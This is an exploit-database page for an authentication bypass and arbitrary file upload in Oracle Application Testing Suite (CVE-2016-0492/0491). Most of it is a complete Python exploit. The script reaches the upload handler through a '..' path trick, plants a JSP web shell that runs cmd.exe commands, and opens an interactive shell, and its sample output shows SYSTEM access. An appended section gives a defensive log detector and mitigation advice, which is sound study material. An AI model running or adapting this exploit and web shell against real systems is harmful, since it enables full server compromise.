Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload
Source: 504137480@qq.com  Author: Zhou Yu  Published: 2016-04-15
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <504137480@qq.com>
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491
 
# Python 2 script (urllib2, raw_input, print statement).
import urllib2
import urllib
 
ip = '192.168.150.239'
port = 8088
 
url = "http://" + ip + ":" + str(port)
# Authentication bypass: the request path begins with the unauthenticated
# Login.do page, but the ".." segments resolve it to the upload handler
# UploadFileUpload.do, which is then reached without a logged-in session.
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)
 
# JSP uploaded as the payload. The doubled braces are literal nested Java
# blocks and the request parameter is literally named "{cmd}"; the script
# never calls .format(), and the shell loop below uses the same literal
# name, so the two stay consistent.
webshell_content='''
<%@ page import="java.util.*,java.io.*"  %>
    <%
        if (request.getParameter("{cmd}") != null) {{
            Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while (disr != null) {{
                out.println(disr);
                disr = dis.readLine();
            }}
        }}
    %>
'''
boundary = "---------------------------7e01e2240a1e"
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
post_data = "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
post_data = post_data + "\r\n.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
post_data = post_data + "\r\n*\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
post_data = post_data + "\r\nDefault\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
post_data = post_data + "\r\n.\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
# Raw string so that "\t" and "\1" are not interpreted as escapes; the
# directory field traverses out of the repository into the deployed war's
# pages directory, which is served as /olt/pages/.
post_data = post_data + "\r\n" + r"../oats\servers\AdminServer\tmp\_WL_user\oats_ee\1ryhnd\war\pages" +"\r\n"
post_data = post_data + "--" + boundary + "--"+"\r\n"
 
try:
    request.add_data(post_data)
    response = urllib2.urlopen(request)
    if response.code == 200 :
        print "[+]upload done!"
        webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
        print "[+]wait a moment,detecting whether the webshell exists..."
        if urllib2.urlopen(webshellurl).code == 200 :
            print "[+]upload webshell successfully!"
            print "[+]return a cmd shell"
            while True:
                cmd = raw_input(">>: ")
                if cmd == "exit" :
                    break
                print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
        else:
            print "[-]attack fail!"
    else:
        print "[-]attack fail!"
except Exception as e:
    print "[-]attack fail!"
 
'''
#run the exploit and get a cmd shell
root@kali:~/Desktop# python exploit.py
[+]upload done!
[+]wait a moment,detecting whether the webshell exists...
[+]upload webshell successfully!
[+]return a cmd shell
>>: whoami
nt authority\system
 
 
>>: exit
'''
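The bypass above works because the request path is accepted on the strength of its unauthenticated "/olt/Login.do" prefix while the container dispatches the normalized path "/olt/UploadFileUpload.do". The following detector is an added example written for this page; it is not the exploit author's code and not Oracle's. It assumes Common Log Format access logs, and it assumes (as the exploit implies but the page does not state outright) that only "/olt/Login.do" is reachable without a session. The sample log lines are constructed to mirror the request sequence the script issues. It also goes slightly beyond the page by percent-decoding the path before normalizing, so an encoded "%2e%2e" variant is normalized the same way as a literal "..".

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Apr/2016:10:00:01 +0000] "GET /olt/Login.do HTTP/1.1" 200 1532
10.0.0.5 - - [15/Apr/2016:10:00:02 +0000] "POST /olt/Login.do/../../olt/UploadFileUpload.do HTTP/1.1" 200 211
10.0.0.5 - - [15/Apr/2016:10:00:03 +0000] "GET /olt/pages/webshell.jsp?{cmd}=whoami HTTP/1.1" 200 24
10.0.0.7 - - [15/Apr/2016:10:05:00 +0000] "POST /olt/UploadFileUpload.do HTTP/1.1" 302 0
10.0.0.9 - - [15/Apr/2016:10:06:00 +0000] "GET /olt/Login.do/%2e%2e/%2e%2e/olt/UploadFileUpload.do HTTP/1.1" 200 211
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Assumption: only the login page is served without a session.
AUTH_EXEMPT_PREFIXES = ("/olt/Login.do",)


def normalize_path(raw_target):
    """Drop the query string, percent-decode, and resolve '.' and '..' segments."""
    path = unquote(raw_target.split("?", 1)[0])
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack)


def exempt_before_normalization(raw_target):
    """The weak decision: a prefix test on the path exactly as the client sent it."""
    return raw_target.split("?", 1)[0].startswith(AUTH_EXEMPT_PREFIXES)


def exempt_after_normalization(raw_target):
    """The correct decision: test the canonical path that will actually be dispatched."""
    return normalize_path(raw_target).startswith(AUTH_EXEMPT_PREFIXES)


def analyze_line(line, traversal_sources):
    """Return a record for one log line; 'findings' is empty when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("target")
    norm = normalize_path(raw)
    findings = []
    if ".." in unquote(raw.split("?", 1)[0]).split("/"):
        findings.append("dot-dot segment in request path")
    if exempt_before_normalization(raw) and not exempt_after_normalization(raw):
        findings.append("login prefix matches only before normalization (auth bypass pattern)")
    if findings:
        traversal_sources.add(m.group("src"))
    elif (m.group("src") in traversal_sources
          and norm.startswith("/olt/pages/") and norm.lower().endswith(".jsp")):
        # Correlation: a JSP under the pages directory fetched by a source that
        # already sent a traversal request is the post-upload step seen above.
        findings.append("JSP under /olt/pages/ requested by a source that sent traversal earlier")
    return {"src": m.group("src"), "ts": m.group("ts"), "method": m.group("method"),
            "raw": raw, "normalized": norm, "findings": findings}


def scan_log(text):
    """Run the detector over a whole log and return only the flagged records."""
    traversal_sources = set()
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        record = analyze_line(line, traversal_sources)
        if record and record["findings"]:
            alerts.append(record)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["src"], alert["method"], alert["raw"], "->", alert["normalized"])
        for f in alert["findings"]:
            print("   ", f)
```

The pair exempt_before_normalization / exempt_after_normalization is the mitigation in miniature: an authentication filter must decide on the canonical path, never on the raw one, and the detector flags exactly the requests on which the two decisions disagree. On the sample log, the plain GET to the login page and the authenticated POST from 10.0.0.7 pass, while the traversal upload, the follow-up JSP request from the same source, and the percent-encoded variant are reported.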
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved